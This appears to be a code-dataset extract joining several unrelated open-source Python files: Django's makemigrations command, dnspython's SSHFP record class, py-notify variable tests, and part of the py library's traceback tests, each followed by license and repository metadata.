parser.add_argument('args', metavar='app_label', nargs='*',
help='Specify the app label(s) to create migrations for.')
parser.add_argument('--dry-run', action='store_true', dest='dry_run', default=False,
help="Just show what migrations would be made; don't actually write them.")
parser.add_argument('--merge', action='store_true', dest='merge', default=False,
help="Enable fixing of migration conflicts.")
parser.add_argument('--empty', action='store_true', dest='empty', default=False,
help="Create an empty migration.")
parser.add_argument('--noinput', '--no-input',
action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.')
parser.add_argument('-n', '--name', action='store', dest='name', default=None,
help="Use this name for migration file(s).")
parser.add_argument('-e', '--exit', action='store_true', dest='exit_code', default=False,
help='Exit with error code 1 if no changes needing migrations are found. '
'Deprecated, use the --check option instead.')
parser.add_argument('--check', action='store_true', dest='check_changes',
help='Exit with a non-zero status if model changes are missing migrations.')
def handle(self, *app_labels, **options):
self.verbosity = options.get('verbosity')
self.interactive = options.get('interactive')
self.dry_run = options.get('dry_run', False)
self.merge = options.get('merge', False)
self.empty = options.get('empty', False)
self.migration_name = options.get('name')
self.exit_code = options.get('exit_code', False)
check_changes = options['check_changes']
if self.exit_code:
warnings.warn(
"The --exit option is deprecated in favor of the --check option.",
RemovedInDjango20Warning
)
# Make sure the app they asked for exists
app_labels = set(app_labels)
bad_app_labels = set()
for app_label in app_labels:
try:
apps.get_app_config(app_label)
except LookupError:
bad_app_labels.add(app_label)
if bad_app_labels:
for app_label in bad_app_labels:
self.stderr.write("App '%s' could not be found. Is it in INSTALLED_APPS?" % app_label)
sys.exit(2)
# Load the current graph state. Pass in None for the connection so
# the loader doesn't try to resolve replaced migrations from DB.
loader = MigrationLoader(None, ignore_no_migrations=True)
# Before anything else, see if there's conflicting apps and drop out
# hard if there are any and they don't want to merge
conflicts = loader.detect_conflicts()
# If app_labels is specified, filter out conflicting migrations for unspecified apps
if app_labels:
conflicts = {
app_label: conflict for app_label, conflict in iteritems(conflicts)
if app_label in app_labels
}
if conflicts and not self.merge:
name_str = "; ".join(
"%s in %s" % (", ".join(names), app)
for app, names in conflicts.items()
)
raise CommandError(
"Conflicting migrations detected; multiple leaf nodes in the "
"migration graph: (%s).\nTo fix them run "
"'python manage.py makemigrations --merge'" % name_str
)
# If they want to merge and there's nothing to merge, then politely exit
if self.merge and not conflicts:
self.stdout.write("No conflicts detected to merge.")
return
# If they want to merge and there is something to merge, then
# divert into the merge code
if self.merge and conflicts:
return self.handle_merge(loader, conflicts)
if self.interactive:
questioner = InteractiveMigrationQuestioner(specified_apps=app_labels, dry_run=self.dry_run)
else:
questioner = NonInteractiveMigrationQuestioner(specified_apps=app_labels, dry_run=self.dry_run)
# Set up autodetector
autodetector = MigrationAutodetector(
loader.project_state(),
ProjectState.from_apps(apps),
questioner,
)
# If they want to make an empty migration, make one for each app
if self.empty:
if not app_labels:
raise CommandError("You must supply at least one app label when using --empty.")
# Make a fake changes() result we can pass to arrange_for_graph
changes = {
app: [Migration("custom", app)]
for app in app_labels
}
changes = autodetector.arrange_for_graph(
changes=changes,
graph=loader.graph,
migration_name=self.migration_name,
)
self.write_migration_files(changes)
return
# Detect changes
changes = autodetector.changes(
graph=loader.graph,
trim_to_apps=app_labels or None,
convert_apps=app_labels or None,
migration_name=self.migration_name,
)
if not changes:
# No changes? Tell them.
if self.verbosity >= 1:
if len(app_labels) == 1:
self.stdout.write("No changes detected in app '%s'" % app_labels.pop())
elif len(app_labels) > 1:
self.stdout.write("No changes detected in apps '%s'" % ("', '".join(app_labels)))
else:
self.stdout.write("No changes detected")
if self.exit_code:
sys.exit(1)
else:
self.write_migration_files(changes)
if check_changes:
sys.exit(1)
def write_migration_files(self, changes):
"""
Takes a changes dict and writes them out as migration files.
"""
directory_created = {}
for app_label, app_migrations in changes.items():
if self.verbosity >= 1:
self.stdout.write(self.style.MIGRATE_HEADING("Migrations for '%s':" % app_label) + "\n")
for migration in app_migrations:
# Describe the migration
writer = MigrationWriter(migration)
if self.verbosity >= 1:
# Display a relative path if it's below the current working
# directory, or an absolute path otherwise.
migration_string = os.path.relpath(writer.path)
if migration_string.startswith('..'):
migration_string = writer.path
self.stdout.write(" %s:\n" % (self.style.MIGRATE_LABEL(migration_string),))
for operation in migration.operations:
self.stdout.write(" - %s\n" % operation.describe())
if not self.dry_run:
# Write the migrations file to the disk.
migrations_directory = os.path.dirname(writer.path)
if not directory_created.get(app_label):
if not os.path.isdir(migrations_directory):
os.mkdir(migrations_directory)
init_path = os.path.join(migrations_directory, "__init__.py")
if not os.path.isfile(init_path):
open(init_path, "w").close()
# We just do this once per app
directory_created[app_label] = True
migration_string = writer.as_string()
with open(writer.path, "wb") as fh:
fh.write(migration_string)
elif self.verbosity == 3:
# Alternatively, makemigrations --dry-run --verbosity 3
# will output the migrations to stdout rather than saving
# the file to the disk.
self.stdout.write(self.style.MIGRATE_HEADING(
"Full migrations file '%s':" % writer.filename) + "\n"
)
self.stdout.write("%s\n" % writer.as_string())
def handle_merge(self, loader, conflicts):
"""
Handles merging together conflicted migrations interactively,
if it's safe; otherwise, advises on how to fix it.
"""
if self.interactive:
questioner = InteractiveMigrationQuestioner()
else:
questioner = MigrationQuestioner(defaults={'ask_merge': True})
for app_label, migration_names in conflicts.items():
# Grab out the migrations in question, and work out their
# common ancestor.
merge_migrations = []
for migration_name in migration_names:
migration = loader.get_migration(app_label, migration_name)
migration.ancestry = [
mig for mig in loader.graph.forwards_plan((app_label, migration_name))
if mig[0] == migration.app_label
]
merge_migrations.append(migration)
all_items_equal = lambda seq: all(item == seq[0] for item in seq[1:])
merge_migrations_generations = zip(*[m.ancestry for m in merge_migrations])
common_ancestor_count = sum(1 for common_ancestor_generation
in takewhile(all_items_equal, merge_migrations_generations))
if not common_ancestor_count:
raise ValueError("Could not find common ancestor of %s" % migration_names)
# Now work out the operations along each divergent branch
for migration in merge_migrations:
migration.branch = migration.ancestry[common_ancestor_count:]
migrations_ops = (loader.get_migration(node_app, node_name).operations
for node_app, node_name in migration.branch)
migration.merged_operations = sum(migrations_ops, [])
# In future, this could use some of the Optimizer code
# (can_optimize_through) to automatically see if they're
# mergeable. For now, we always just prompt the user.
if self.verbosity > 0:
self.stdout.write(self.style.MIGRATE_HEADING("Merging %s" % app_label))
for migration in merge_migrations:
self.stdout.write(self.style.MIGRATE_LABEL(" Branch %s" % migration.name))
for operation in migration.merged_operations:
self.stdout.write(" - %s\n" % operation.describe())
if questioner.ask_merge(app_label):
# If they still want to merge it, then write out an empty
# file depending on the migrations needing merging.
numbers = [
MigrationAutodetector.parse_number(migration.name)
for migration in merge_migrations
]
try:
biggest_number = max(x for x in numbers if x is not None)
except ValueError:
biggest_number = 1
subclass = type("Migration", (Migration, ), {
"dependencies": [(app_label, migration.name) for migration in merge_migrations],
})
new_migration = subclass("%04i_merge" % (biggest_number + 1), app_label)
writer = MigrationWriter(new_migration)
if not self.dry_run:
# Write the merge migrations file to the disk
with open(writer.path, "wb") as fh:
fh.write(writer.as_string())
if self.verbosity > 0:
self.stdout.write("\nCreated new merge migration %s" % writer.path)
elif self.verbosity == 3:
# Alternatively, makemigrations --merge --dry-run --verbosity 3
# will output the merge migrations to stdout rather than saving
# the file to the disk.
self.stdout.write(self.style.MIGRATE_HEADING(
"Full merge migrations file '%s':" % writer.filename) + "\n"
)
self.stdout.write("%s\n" % writer.as_string())
| bsd-3-clause |
4shadoww/hakkuframework | core/lib/dns/rdtypes/ANY/SSHFP.py | 8 | 2829 | # Copyright (C) 2005-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import struct
import binascii
import dns.rdata
import dns.rdatatype
class SSHFP(dns.rdata.Rdata):
"""SSHFP record
@ivar algorithm: the algorithm
@type algorithm: int
@ivar fp_type: the digest type
@type fp_type: int
@ivar fingerprint: the fingerprint
@type fingerprint: string
@see: draft-ietf-secsh-dns-05.txt"""
__slots__ = ['algorithm', 'fp_type', 'fingerprint']
def __init__(self, rdclass, rdtype, algorithm, fp_type,
fingerprint):
super(SSHFP, self).__init__(rdclass, rdtype)
self.algorithm = algorithm
self.fp_type = fp_type
self.fingerprint = fingerprint
def to_text(self, origin=None, relativize=True, **kw):
return '%d %d %s' % (self.algorithm,
self.fp_type,
dns.rdata._hexify(self.fingerprint,
chunksize=128))
@classmethod
def from_text(cls, rdclass, rdtype, tok, origin=None, relativize=True):
algorithm = tok.get_uint8()
fp_type = tok.get_uint8()
chunks = []
while 1:
t = tok.get().unescape()
if t.is_eol_or_eof():
break
if not t.is_identifier():
raise dns.exception.SyntaxError
chunks.append(t.value.encode())
fingerprint = b''.join(chunks)
fingerprint = binascii.unhexlify(fingerprint)
return cls(rdclass, rdtype, algorithm, fp_type, fingerprint)
def to_wire(self, file, compress=None, origin=None):
header = struct.pack("!BB", self.algorithm, self.fp_type)
file.write(header)
file.write(self.fingerprint)
@classmethod
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin=None):
header = struct.unpack("!BB", wire[current: current + 2])
current += 2
rdlen -= 2
fingerprint = wire[current: current + rdlen].unwrap()
return cls(rdclass, rdtype, header[0], header[1], fingerprint)
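# Example sketch (added for illustration; the fingerprint bytes are made up and
# not a real key digest): constructing an SSHFP rdata directly and rendering
# its presentation format with the class defined above.
#
#   fp = binascii.unhexlify(b'123456789abcdef67890123456789abcdef67890')
#   rdata = SSHFP(1, 44, 2, 1, fp)   # rdclass IN (1), rdtype SSHFP (44)
#   rdata.to_text()                  # -> '2 1 123456789abcdef67890...'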
| mit |
kived/py-cnotify | test/variable.py | 4 | 15715 | # -*- coding: utf-8 -*-
#--------------------------------------------------------------------#
# This file is part of Py-notify. #
# #
# Copyright (C) 2007, 2008 Paul Pogonyshev. #
# #
# This library is free software; you can redistribute it and/or #
# modify it under the terms of the GNU Lesser General Public License #
# as published by the Free Software Foundation; either version 2.1 #
# of the License, or (at your option) any later version. #
# #
# This library is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU #
# Lesser General Public License for more details. #
# #
# You should have received a copy of the GNU Lesser General Public #
# License along with this library; if not, write to the Free #
# Software Foundation, Inc., 51 Franklin Street, Fifth Floor, #
# Boston, MA 02110-1301 USA #
#--------------------------------------------------------------------#
if __name__ == '__main__':
import os
import sys
sys.path.insert (0, os.path.join (sys.path[0], os.pardir))
import math
import unittest
from notify.variable import AbstractVariable, AbstractValueTrackingVariable, Variable, \
WatcherVariable
from notify.utils import StringType
from test.__common import NotifyTestCase, NotifyTestObject
class BaseVariableTestCase (NotifyTestCase):
def test_mutable (self):
mutable_variable = Variable ()
self.assert_(mutable_variable.mutable)
def test_predicate_1 (self):
variable = Variable (0)
is_single_digit = variable.predicate (lambda value: 0 <= value < 10)
self.assert_(is_single_digit)
self.assert_(not is_single_digit.mutable)
variable.value = -5
self.assert_(not is_single_digit)
variable.value = 9
self.assert_(is_single_digit)
variable.value = 100
self.assert_(not is_single_digit)
def test_predicate_2 (self):
test = NotifyTestObject ()
variable = Variable (0)
variable.predicate (lambda value: 0 <= value < 10).store (test.simple_handler)
variable.value = 5
variable.value = 15
variable.value = -1
variable.value = 9
variable.value = 3
test.assert_results (True, False, True)
def test_is_true (self):
variable = Variable (0)
is_true = variable.is_true ()
self.assert_(not is_true)
variable.value = 'string'
self.assert_(is_true)
variable.value = []
self.assert_(not is_true)
variable.value = None
self.assert_(not is_true)
variable.value = 25
self.assert_(is_true)
def test_transformation_1 (self):
variable = Variable (0)
floor = variable.transform (math.floor)
self.assertEqual (floor.value, 0)
self.assert_(not floor.mutable)
variable.value = 10.5
self.assertEqual (floor.value, 10)
variable.value = 15
self.assertEqual (floor.value, 15)
def test_transformation_2 (self):
test = NotifyTestObject ()
variable = Variable (0)
variable.transform (math.floor).store (test.simple_handler)
variable.value = 5
variable.value = 5.6
variable.value = 15.7
variable.value = 16
variable.value = 16.5
variable.value = 16.2
test.assert_results (0, 5, 15, 16)
def test_is_allowed_value (self):
class PositiveVariable (Variable):
def is_allowed_value (self, value):
return isinstance (value, int) and value > 0
variable = PositiveVariable (6)
# Must not raise.
variable.value = 9
variable.value = 999
# Must raise.
self.assertRaises (ValueError, lambda: variable.set (0))
self.assertRaises (ValueError, lambda: variable.set (-5))
self.assertRaises (ValueError, lambda: variable.set (2.2))
self.assertRaises (ValueError, lambda: variable.set ([]))
class WatcherVariableTestCase (NotifyTestCase):
def test_watcher_variable_1 (self):
test = NotifyTestObject ()
watcher = WatcherVariable ()
watcher.store (test.simple_handler)
variable = Variable ('abc')
watcher.watch (variable)
self.assert_(watcher.watched_variable is variable)
variable.value = 60
test.assert_results (None, 'abc', 60)
def test_watcher_variable_2 (self):
test = NotifyTestObject ()
variable1 = Variable ([])
variable2 = Variable ('string')
variable3 = Variable ('string')
watcher = WatcherVariable (variable1)
watcher.store (test.simple_handler)
watcher.watch (variable2)
watcher.watch (variable3)
watcher.watch (None)
self.assert_(watcher.watched_variable is None)
# Later two watch() calls must not change watcher's value.
test.assert_results ([], 'string', None)
def test_watcher_variable_error_1 (self):
self.assertRaises (TypeError, lambda: WatcherVariable (25))
def test_watcher_variable_error_2 (self):
watcher = WatcherVariable ()
self.assertRaises (TypeError, lambda: watcher.watch (25))
def test_watcher_variable_error_3 (self):
variable = Variable ()
watcher = WatcherVariable (variable)
self.assertRaises (ValueError, lambda: watcher.watch (watcher))
self.assert_ (watcher.watched_variable is variable)
class VariableDerivationTestCase (NotifyTestCase):
def test_derivation_1 (self):
IntVariable = Variable.derive_type ('IntVariable', allowed_value_types = int)
# Since None is not an allowed value, there must be no default constructor.
self.assertRaises (TypeError, lambda: IntVariable ())
count = IntVariable (10)
self.assertEqual (count.value, 10)
self.assertEqual (count.mutable, True)
count.value = 30
self.assertEqual (count.value, 30)
self.assertRaises (ValueError, lambda: count.set ('invalid'))
def test_derivation_2 (self):
EnumVariable = Variable.derive_type ('EnumVariable',
allowed_values = (None, 'a', 'b', 'c'))
variable = EnumVariable ()
self.assertEqual (variable.value, None)
self.assertEqual (variable.mutable, True)
variable.value = 'b'
self.assertEqual (variable.value, 'b')
self.assertRaises (ValueError, lambda: variable.set (15))
self.assertRaises (ValueError, lambda: variable.set ('d'))
def test_derivation_3 (self):
AbstractIntVariable = AbstractValueTrackingVariable.derive_type (
'AbstractIntVariable', allowed_value_types = int)
self.assertEqual (AbstractIntVariable (-5).mutable, False)
def test_derivation_4 (self):
NumericVariable = Variable.derive_type ('NumericVariable',
allowed_value_types = (int, float, complex))
self.assertRaises (TypeError, lambda: NumericVariable ())
variable = NumericVariable (0)
variable.value = 15
self.assertEqual (variable.value, 15)
variable.value = -2.5
self.assertEqual (variable.value, -2.5)
variable.value = 1j
self.assertEqual (variable.value, 1j)
self.assertRaises (ValueError, lambda: variable.set ('string'))
self.assertRaises (ValueError, lambda: variable.set ([]))
def test_derivation_5 (self):
IntVariable = Variable.derive_type ('IntVariable',
allowed_value_types = int, default_value = 10)
variable = IntVariable ()
self.assertEqual (variable.value, 10)
variable = IntVariable (30)
self.assertEqual (variable.value, 30)
self.assertRaises (ValueError, lambda: variable.set ('string'))
def test_derivation_6 (self):
StringVariable = Variable.derive_type ('StringVariable',
allowed_value_types = StringType,
setter = lambda variable, value: None)
variable = StringVariable ('')
self.assertRaises (ValueError, lambda: variable.set (None))
def test_derivation_7 (self):
DerivedVariable = \
AbstractValueTrackingVariable.derive_type ('DerivedVariable',
setter = lambda variable, value: None)
variable = DerivedVariable ()
self.assert_(variable.value is None)
variable.set (100)
self.assert_(variable.value == 100)
variable.value = 'abc'
self.assert_(variable.value == 'abc')
def test_derivation_8 (self):
test = NotifyTestObject ()
DerivedVariable = \
AbstractValueTrackingVariable.derive_type ('DerivedVariable',
getter = lambda variable: None,
setter = (lambda variable, value:
test.simple_handler (value)))
variable = DerivedVariable ()
variable.set (100)
variable.value = 'abc'
# The default value is retrieved with the getter function, so the setter must not
# be called during variable creation.
test.assert_results (100, 'abc')
def test_derivation_9 (self):
test = NotifyTestObject ()
DerivedVariable = \
AbstractValueTrackingVariable.derive_type ('DerivedVariable',
setter = (lambda variable, value:
test.simple_handler (value)))
variable = DerivedVariable ()
variable.set (100)
variable.value = 'abc'
# There is no getter at all, so setter must be called during variable creation.
test.assert_results (None, 100, 'abc')
def test_derivation_10 (self):
def set_value (list, value):
list[0] = value
DerivedVariable = AbstractVariable.derive_type ('DerivedVariable',
object = '__list', property = 'list',
getter = lambda list: list[0],
setter = set_value)
a = DerivedVariable ([123])
self.assertEqual (a.value, 123)
a.value = 'foo'
self.assertEqual (a.value, 'foo')
self.assertEqual (a.list, ['foo'])
def test_derivation_11 (self):
# Test that derivation with keyword slot or property raises.
self.assertRaises (ValueError, lambda: AbstractVariable.derive_type ('DerivedVariable',
object = 'or'))
self.assertRaises (ValueError, lambda: AbstractVariable.derive_type ('DerivedVariable',
object = '__class',
property = 'class'))
# Test against a real bug present up to 0.1.12.
def test_derivation_12 (self):
DerivedVariable = AbstractValueTrackingVariable.derive_type ('DerivedVariable',
object = '__list',
property = 'list')
variable = DerivedVariable ([1, 2, 3], 200)
self.assertEqual (variable.list, [1, 2, 3])
self.assertEqual (variable.value, 200)
def test_object_derivation_1 (self):
class MainObject (object):
def __init__(self, x):
self.__x = x
def get_x (self):
return self.__x
XVariable = AbstractValueTrackingVariable.derive_type ('XVariable', object = 'main',
getter = MainObject.get_x)
main = MainObject (100)
variable = XVariable (main)
self.assert_(variable.main is main)
self.assert_(variable.value is main.get_x ())
main.x = 200
self.assert_(variable.value is main.get_x ())
def test_object_derivation_2 (self):
class MainObject (object):
def __init__(self, x):
self.__x = x
self.__x_variable = XVariable (self)
def get_x (self):
return self.__x
def _set_x (self, x):
self.__x = x
x = property (lambda self: self.__x_variable)
XVariable = AbstractValueTrackingVariable.derive_type ('XVariable',
object = '__main',
property = 'main',
getter = MainObject.get_x,
setter = MainObject._set_x)
main = MainObject (100)
self.assert_(main.x.main is main)
self.assert_(main.x.value is main.get_x ())
main.x.value = 200
self.assert_(main.x.value is main.get_x ())
def set_main_x ():
main.x = None
self.assertRaises (AttributeError, set_main_x)
def test_derivation_slots (self):
DerivedVariable = AbstractVariable.derive_type ('DerivedVariable')
self.assertRaises (AttributeError, self.non_existing_attribute_setter (DerivedVariable ()))
DerivedVariable = AbstractValueTrackingVariable.derive_type ('DerivedVariable')
self.assertRaises (AttributeError, self.non_existing_attribute_setter (DerivedVariable ()))
DerivedVariable = Variable.derive_type ('DerivedVariable')
self.assertRaises (AttributeError, self.non_existing_attribute_setter (DerivedVariable ()))
def test_multiple_derivation (self):
# Derive two types and make sure they don't spoil each other's is_allowed_value()
# method.
IntVariable = Variable.derive_type ('IntVariable', allowed_value_types = int)
StrVariable = Variable.derive_type ('StrVariable', allowed_value_types = str)
integer = IntVariable (10)
string = StrVariable ('test')
integer.value = 20
self.assertEqual (integer.value, 20)
string.value = 'string'
self.assertEqual (string.value, 'string')
self.assertRaises (ValueError, lambda: integer.set ('foo'))
self.assertRaises (ValueError, lambda: string .set (-1000))
self.assertRaises (ValueError, lambda: integer.set (''))
self.assertRaises (ValueError, lambda: string .set (0))
if __name__ == '__main__':
unittest.main ()
# Local variables:
# mode: python
# python-indent: 4
# indent-tabs-mode: nil
# fill-column: 90
# End:
| lgpl-2.1 |
samuknet/servo | tests/wpt/web-platform-tests/tools/py/testing/code/test_excinfo.py | 160 | 30688 | # -*- coding: utf-8 -*-
import py
from py._code.code import FormattedExcinfo, ReprExceptionInfo
queue = py.builtin._tryimport('queue', 'Queue')
failsonjython = py.test.mark.xfail("sys.platform.startswith('java')")
from test_source import astonly
try:
import importlib
except ImportError:
invalidate_import_caches = None
else:
invalidate_import_caches = getattr(importlib, "invalidate_caches", None)
import pytest
pytest_version_info = tuple(map(int, pytest.__version__.split(".")[:3]))
class TWMock:
def __init__(self):
self.lines = []
def sep(self, sep, line=None):
self.lines.append((sep, line))
def line(self, line, **kw):
self.lines.append(line)
def markup(self, text, **kw):
return text
fullwidth = 80
def test_excinfo_simple():
try:
raise ValueError
except ValueError:
info = py.code.ExceptionInfo()
assert info.type == ValueError
def test_excinfo_getstatement():
def g():
raise ValueError
def f():
g()
try:
f()
except ValueError:
excinfo = py.code.ExceptionInfo()
linenumbers = [py.code.getrawcode(f).co_firstlineno-1+3,
py.code.getrawcode(f).co_firstlineno-1+1,
py.code.getrawcode(g).co_firstlineno-1+1,]
l = list(excinfo.traceback)
foundlinenumbers = [x.lineno for x in l]
assert foundlinenumbers == linenumbers
#for x in info:
# print "%s:%d %s" %(x.path.relto(root), x.lineno, x.statement)
#xxx
# testchain for getentries test below
def f():
#
raise ValueError
#
def g():
#
__tracebackhide__ = True
f()
#
def h():
#
g()
#
class TestTraceback_f_g_h:
def setup_method(self, method):
try:
h()
except ValueError:
self.excinfo = py.code.ExceptionInfo()
def test_traceback_entries(self):
tb = self.excinfo.traceback
entries = list(tb)
assert len(tb) == 4 # maybe fragile test
assert len(entries) == 4 # maybe fragile test
names = ['f', 'g', 'h']
for entry in entries:
try:
names.remove(entry.frame.code.name)
except ValueError:
pass
assert not names
def test_traceback_entry_getsource(self):
tb = self.excinfo.traceback
s = str(tb[-1].getsource() )
assert s.startswith("def f():")
assert s.endswith("raise ValueError")
@astonly
@failsonjython
def test_traceback_entry_getsource_in_construct(self):
source = py.code.Source("""\
def xyz():
try:
raise ValueError
except somenoname:
pass
xyz()
""")
try:
exec (source.compile())
except NameError:
tb = py.code.ExceptionInfo().traceback
print (tb[-1].getsource())
s = str(tb[-1].getsource())
assert s.startswith("def xyz():\n try:")
assert s.strip().endswith("except somenoname:")
def test_traceback_cut(self):
co = py.code.Code(f)
path, firstlineno = co.path, co.firstlineno
traceback = self.excinfo.traceback
newtraceback = traceback.cut(path=path, firstlineno=firstlineno)
assert len(newtraceback) == 1
newtraceback = traceback.cut(path=path, lineno=firstlineno+2)
assert len(newtraceback) == 1
def test_traceback_cut_excludepath(self, testdir):
p = testdir.makepyfile("def f(): raise ValueError")
excinfo = py.test.raises(ValueError, "p.pyimport().f()")
basedir = py.path.local(py.test.__file__).dirpath()
newtraceback = excinfo.traceback.cut(excludepath=basedir)
for x in newtraceback:
if hasattr(x, 'path'):
assert not py.path.local(x.path).relto(basedir)
assert newtraceback[-1].frame.code.path == p
def test_traceback_filter(self):
traceback = self.excinfo.traceback
ntraceback = traceback.filter()
assert len(ntraceback) == len(traceback) - 1
def test_traceback_recursion_index(self):
def f(n):
if n < 10:
n += 1
f(n)
excinfo = py.test.raises(RuntimeError, f, 8)
traceback = excinfo.traceback
recindex = traceback.recursionindex()
assert recindex == 3
def test_traceback_only_specific_recursion_errors(self, monkeypatch):
def f(n):
if n == 0:
raise RuntimeError("hello")
f(n-1)
excinfo = pytest.raises(RuntimeError, f, 100)
monkeypatch.delattr(excinfo.traceback.__class__, "recursionindex")
repr = excinfo.getrepr()
assert "RuntimeError: hello" in str(repr.reprcrash)
def test_traceback_no_recursion_index(self):
def do_stuff():
raise RuntimeError
def reraise_me():
import sys
exc, val, tb = sys.exc_info()
py.builtin._reraise(exc, val, tb)
def f(n):
try:
do_stuff()
except:
reraise_me()
excinfo = py.test.raises(RuntimeError, f, 8)
traceback = excinfo.traceback
recindex = traceback.recursionindex()
assert recindex is None
def test_traceback_messy_recursion(self):
#XXX: simplified locally testable version
decorator = py.test.importorskip('decorator').decorator
def log(f, *k, **kw):
print('%s %s' % (k, kw))
f(*k, **kw)
log = decorator(log)
def fail():
raise ValueError('')
fail = log(log(fail))
excinfo = py.test.raises(ValueError, fail)
assert excinfo.traceback.recursionindex() is None
def test_traceback_getcrashentry(self):
def i():
__tracebackhide__ = True
raise ValueError
def h():
i()
def g():
__tracebackhide__ = True
h()
def f():
g()
excinfo = py.test.raises(ValueError, f)
tb = excinfo.traceback
entry = tb.getcrashentry()
co = py.code.Code(h)
assert entry.frame.code.path == co.path
assert entry.lineno == co.firstlineno + 1
assert entry.frame.code.name == 'h'
def test_traceback_getcrashentry_empty(self):
def g():
__tracebackhide__ = True
raise ValueError
def f():
__tracebackhide__ = True
g()
excinfo = py.test.raises(ValueError, f)
tb = excinfo.traceback
entry = tb.getcrashentry()
co = py.code.Code(g)
assert entry.frame.code.path == co.path
assert entry.lineno == co.firstlineno + 2
assert entry.frame.code.name == 'g'
def hello(x):
x + 5
def test_tbentry_reinterpret():
try:
hello("hello")
except TypeError:
excinfo = py.code.ExceptionInfo()
tbentry = excinfo.traceback[-1]
msg = tbentry.reinterpret()
assert msg.startswith("TypeError: ('hello' + 5)")
def test_excinfo_exconly():
excinfo = py.test.raises(ValueError, h)
assert excinfo.exconly().startswith('ValueError')
excinfo = py.test.raises(ValueError,
"raise ValueError('hello\\nworld')")
msg = excinfo.exconly(tryshort=True)
assert msg.startswith('ValueError')
assert msg.endswith("world")
def test_excinfo_repr():
excinfo = py.test.raises(ValueError, h)
s = repr(excinfo)
assert s == "<ExceptionInfo ValueError tblen=4>"
def test_excinfo_str():
excinfo = py.test.raises(ValueError, h)
s = str(excinfo)
assert s.startswith(__file__[:-9]) # pyc file and $py.class
assert s.endswith("ValueError")
assert len(s.split(":")) >= 3 # on windows it's 4
def test_excinfo_errisinstance():
excinfo = py.test.raises(ValueError, h)
assert excinfo.errisinstance(ValueError)
def test_excinfo_no_sourcecode():
try:
exec ("raise ValueError()")
except ValueError:
excinfo = py.code.ExceptionInfo()
s = str(excinfo.traceback[-1])
if py.std.sys.version_info < (2,5):
assert s == " File '<string>':1 in ?\n ???\n"
else:
assert s == " File '<string>':1 in <module>\n ???\n"
def test_excinfo_no_python_sourcecode(tmpdir):
#XXX: simplified locally testable version
tmpdir.join('test.txt').write("{{ h()}}:")
jinja2 = py.test.importorskip('jinja2')
loader = jinja2.FileSystemLoader(str(tmpdir))
env = jinja2.Environment(loader=loader)
template = env.get_template('test.txt')
excinfo = py.test.raises(ValueError,
template.render, h=h)
for item in excinfo.traceback:
print(item) #XXX: for some reason jinja.Template.render is printed in full
item.source # shouldnt fail
if item.path.basename == 'test.txt':
assert str(item.source) == '{{ h()}}:'
def test_entrysource_Queue_example():
try:
queue.Queue().get(timeout=0.001)
except queue.Empty:
excinfo = py.code.ExceptionInfo()
entry = excinfo.traceback[-1]
source = entry.getsource()
assert source is not None
s = str(source).strip()
assert s.startswith("def get")
def test_codepath_Queue_example():
try:
queue.Queue().get(timeout=0.001)
except queue.Empty:
excinfo = py.code.ExceptionInfo()
entry = excinfo.traceback[-1]
path = entry.path
assert isinstance(path, py.path.local)
assert path.basename.lower() == "queue.py"
assert path.check()
class TestFormattedExcinfo:
def pytest_funcarg__importasmod(self, request):
def importasmod(source):
source = py.code.Source(source)
tmpdir = request.getfuncargvalue("tmpdir")
modpath = tmpdir.join("mod.py")
tmpdir.ensure("__init__.py")
modpath.write(source)
if invalidate_import_caches is not None:
invalidate_import_caches()
return modpath.pyimport()
return importasmod
def excinfo_from_exec(self, source):
source = py.code.Source(source).strip()
try:
exec (source.compile())
except KeyboardInterrupt:
raise
except:
return py.code.ExceptionInfo()
assert 0, "did not raise"
def test_repr_source(self):
pr = FormattedExcinfo()
source = py.code.Source("""
def f(x):
pass
""").strip()
pr.flow_marker = "|"
lines = pr.get_source(source, 0)
assert len(lines) == 2
assert lines[0] == "| def f(x):"
assert lines[1] == " pass"
def test_repr_source_excinfo(self):
""" check if indentation is right """
pr = FormattedExcinfo()
excinfo = self.excinfo_from_exec("""
def f():
assert 0
f()
""")
pr = FormattedExcinfo()
source = pr._getentrysource(excinfo.traceback[-1])
lines = pr.get_source(source, 1, excinfo)
assert lines == [
' def f():',
'> assert 0',
'E assert 0'
]
def test_repr_source_not_existing(self):
pr = FormattedExcinfo()
co = compile("raise ValueError()", "", "exec")
try:
exec (co)
except ValueError:
excinfo = py.code.ExceptionInfo()
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[1].lines[0] == "> ???"
def test_repr_many_line_source_not_existing(self):
pr = FormattedExcinfo()
co = compile("""
a = 1
raise ValueError()
""", "", "exec")
try:
exec (co)
except ValueError:
excinfo = py.code.ExceptionInfo()
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[1].lines[0] == "> ???"
def test_repr_source_failing_fullsource(self):
pr = FormattedExcinfo()
class FakeCode(object):
class raw:
co_filename = '?'
path = '?'
firstlineno = 5
def fullsource(self):
return None
fullsource = property(fullsource)
class FakeFrame(object):
code = FakeCode()
f_locals = {}
f_globals = {}
class FakeTracebackEntry(py.code.Traceback.Entry):
def __init__(self, tb):
self.lineno = 5+3
@property
def frame(self):
return FakeFrame()
class Traceback(py.code.Traceback):
Entry = FakeTracebackEntry
class FakeExcinfo(py.code.ExceptionInfo):
typename = "Foo"
def __init__(self):
pass
def exconly(self, tryshort):
return "EXC"
def errisinstance(self, cls):
return False
excinfo = FakeExcinfo()
class FakeRawTB(object):
tb_next = None
tb = FakeRawTB()
